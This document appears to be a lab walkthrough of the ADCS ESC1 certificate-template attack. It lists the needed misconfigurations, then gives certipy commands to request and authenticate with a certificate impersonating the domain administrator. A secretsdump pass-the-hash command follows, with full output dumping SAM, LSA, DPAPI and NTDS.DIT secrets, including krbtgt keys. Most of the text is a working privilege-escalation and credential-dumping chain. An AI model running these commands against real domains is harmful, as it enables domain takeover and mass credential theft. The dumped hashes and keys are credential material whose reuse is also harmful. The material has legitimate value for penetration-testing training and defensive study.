ADCS - ESC1

Misconfigured Certificate Template – ESC1

In order to exploit this attack, the following pre-requisite is required:

Pre-Requisite:

• Manager approval is disabled –> mspki-enrollment-flag attribute needs to be set to 0x00000000

• No authorized signature is required –> msPKI-RA-Signature attribute needs to be set to 0x00000000

• Certificate Template allows a requestor to specify a SAN in the Certificate Signing Request –> msPKI-Certificate-Name-Flag attribute needs to be set to 0x00000001. This flag instructs the client to supply subject information in the certificate request.

• Certificate Template defines Extended Key Usage (EKU) that enables Client Authentication –> mspki-certificate-application-policy attribute needs to contain at least one of the following: Client Authentication (1.3.6.1.5.5.7.3.2), PKINIT Client Authentication (1.3.6.1.5.2.3.4), Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2), Any Purpose (OID 2.5.29.37.0) or no EKU (SubCA).

• Certificate Template needs to be published in Active Directory

• Non-Privileged user can enroll to the Certificate Template

Enumerate

sudo certipy find -u joaquin.Pereida@maryland.local -p 'horse' -dc-ip 192.168.56.12

sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target salisbury.maryland.local -template ESC1 -ca MARYLAND-CA -upn administrator@maryland.local

• authentication with the pfx we request before

sudo certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

Attack Attack and Dump Dump!

sudo secretsdump.py -hashes 'aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da' -no-pass MARYLAND.LOCAL/'administrator'@baltimore.maryland.local



Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x55bcc2f420b94b197fdea8d57999bb0f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
maryland\BALTIMORE$:aes256-cts-hmac-sha1-96:d5db0e1eeb9aadf5a3d2330b955438133b614c4e263f692b9bd487814ce3926b
maryland\BALTIMORE$:aes128-cts-hmac-sha1-96:816b42584c5136c06687d948544fbef9
maryland\BALTIMORE$:des-cbc-md5:944f4a64e602e901
maryland\BALTIMORE$:plain_password_hex:66db8f6d157845210296cdfac78bbf218441c78a2fb7d50b261d7b8596f069f74fff11c3e5a0296fc58e43e1fef6132ff97b3443db83824ebbb9c5f0e8d2bb62ae0bd6132271eaa708220e58761edf957e155370951576875b41d0f008e31a661e356549374dc2513d53216b71a26dec20108e2c32615b7018b0c8d0cd35d97947c25bb00fdb35a2ce26e4432fe2a8fe4409ad7b79dc152d677a80504107880d22e69db49cbc1420b8cc275087d18c2ee9a3bd9b6264c9767ff6812225e8530576a68faa71623d09fa19ad87bf38f4e4f77eb3a50354a1ad593f6184023fabd5058385bbb286e436a92d26f7240285f3
maryland\BALTIMORE$:aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xcc5f5b99177502167153e1d5768394695e9bdf99
dpapi_userkey:0x01780d53108beb7a3c593cdb105a6bd99d23e35d
[*] NL$KM 
 0000   48 12 38 16 FC 21 D8 4B  13 02 2E EF A9 E1 B3 FF   H.8..!.K........
 0010   C8 F3 E1 9B 62 AC A5 2C  F8 3E 07 1B 66 C5 93 AD   ....b..,.>..f...
 0020   06 16 32 5D 1D 00 C0 84  9B EF 1F 84 1C B1 E3 F3   ..2]............
 0030   41 8A ED 9D 0A 6A 75 6F  EC 7B D9 79 CF 8E 24 D9   A....juo.{.y..$.
NL$KM:48123816fc21d84b13022eefa9e1b3ffc8f3e19b62aca52cf83e071b66c593ad0616325d1d00c0849bef1f841cb1e3f3418aed9d0a6a756fec7bd979cf8e24d9
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1ad253c7f9110449bd1ccbcadf2ca611:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759:::
SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:12df918c6cba0ab538b68f10071a1fa5:::
removemiccomputer$:1118:aad3b435b51404eeaad3b435b51404ee:5f2b81280e10f0ab21fd304926276b50:::
newyork$:1105:aad3b435b51404eeaad3b435b51404ee:16827e6dccaaa8328e7092324980f207:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:cc3be59a5acba141ca609606d2f1044da2a09c5e459eaa13c7b5049b73d97fc1
krbtgt:aes128-cts-hmac-sha1-96:fccc68bcbfa913189120b6ed852370d2
krbtgt:des-cbc-md5:dfbcb6d6b61ab0d9
carmelo.Anthony:aes256-cts-hmac-sha1-96:da49788946f1189c92fda8683bd91bc0b18933a0cb5770d30c9f4648b9fefb20
carmelo.Anthony:aes128-cts-hmac-sha1-96:e728e401a5678362449ceacd2b53dec9
carmelo.Anthony:des-cbc-md5:5ed5d58f941ac4d3
marisol.Pedrosa:aes256-cts-hmac-sha1-96:0434de9634d3fdbe82d9eb4e3a9f4585e6cfaa53496c9f7ab5cc1756ff0e2c3c
marisol.Pedrosa:aes128-cts-hmac-sha1-96:edc33b98ff48acffffd2ee458e7b6f37
marisol.Pedrosa:des-cbc-md5:3880f704233251ef
joaquin.Pereida:aes256-cts-hmac-sha1-96:2bf5b6bab188c1f1e511103f9680a9b32b7070058c7e1d2325eb9127e203f669
joaquin.Pereida:aes128-cts-hmac-sha1-96:85bebf4f5cc7d1844ec77df9826ae218
joaquin.Pereida:des-cbc-md5:eadc6129d53d7f9b
teresa.Perez:aes256-cts-hmac-sha1-96:587d5001d364508978405ab03fb948e413ac3dd4b104ea0628f19470fdb87698
teresa.Perez:aes128-cts-hmac-sha1-96:f118b7fb468c7e03029e20c4cdcadce4
teresa.Perez:des-cbc-md5:f8cb466d323426bf
sql_svc:aes256-cts-hmac-sha1-96:083d0c0d67888d379487d0f077f978f97b1450da1e534026e36fa966aa13ebf5
sql_svc:aes128-cts-hmac-sha1-96:8f78454e50d88f401a9cb8270a667ef0
sql_svc:des-cbc-md5:7615a14c5d924020
BALTIMORE$:aes256-cts-hmac-sha1-96:d5db0e1eeb9aadf5a3d2330b955438133b614c4e263f692b9bd487814ce3926b
BALTIMORE$:aes128-cts-hmac-sha1-96:816b42584c5136c06687d948544fbef9
BALTIMORE$:des-cbc-md5:1cec269d492083a4
SALISBURY$:aes256-cts-hmac-sha1-96:8a710f05d3b7e0a65fd65cbc59b145108d2a3363c8e164a1f6d44cf048b71a19
SALISBURY$:aes128-cts-hmac-sha1-96:5d1517fd3dbffcf8bd4593e1a0c64cbb
SALISBURY$:des-cbc-md5:b9649880cedabf5b
removemiccomputer$:aes256-cts-hmac-sha1-96:c05f13f6c920df947ad6175fac1012dd7ad00e685265e751af7dd650fc7488e5
removemiccomputer$:aes128-cts-hmac-sha1-96:90e4ab90a5d2f70330532c090ccb46d5
removemiccomputer$:des-cbc-md5:bcbf499eadc86bf2
newyork$:aes256-cts-hmac-sha1-96:b23029736e3e970a614dcdee7d39b0251ca18bfd344716d68c5ea08fa6d7a0c6
newyork$:aes128-cts-hmac-sha1-96:765ca5011fa4a49c46e817d486f59405
newyork$:des-cbc-md5:4a43a276f1d6c4f2
[*] Cleaning up...